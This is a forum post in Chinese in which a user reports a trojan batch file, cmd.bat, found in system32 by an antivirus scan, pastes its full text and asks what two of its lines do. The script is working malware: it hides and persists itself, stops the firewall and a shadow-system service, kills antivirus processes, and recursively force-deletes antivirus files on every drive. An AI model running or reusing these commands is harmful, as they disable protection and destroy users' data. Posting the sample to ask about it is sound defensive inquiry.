ljxian
新手上路
积分 42
发帖 42
注册 2007-4-7
|
#1 Dropped:Trojan.Bat.Agent.BL木马
本机装有微点家庭版,但有因为其没有病毒扫描功能,也是为了集百家之长,装了360杀毒绿色版V1.0Beta(它可能和别的杀毒软件并存)
微点没有任何提示的情况下, 系统有些反应不大正常(比如开机是速度慢等)又打开360来扫描了一下,又发现了Dropped:Trojan.Bat.Agent.BL
它存在于windows\system32\文件夹中,文件名为cmd.bat(不知道是不是借cmd.exe来伪装), 因为是bat文件可以用记事本打开来看,其内容如下:
@echo off
set s=TASKKILL
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat +r +s +h
net stop sharedaccess >nul
%s% /im 360* /f >nul
%s% /im RStray /f >nul
net stop Shadow" "System" "Service
set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a:\RStray* /f /s /q >nul
看样子我的360杀毒绿色版没有被删除是因为我自定义了文件夹,(看来多动手是有好处的哦)
有两行看得不很懂:
net stop sharedaccess >nul 停止共享吗? 对它有什么好处?
net stop Shadow" "System" "Service 这是什么意思?
| |
※ ※ ※ 本文纯属【ljxian】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
我的支持也许微不足道,但我们的支持可以撑起一片蓝天,我深信这一点 |
|
|
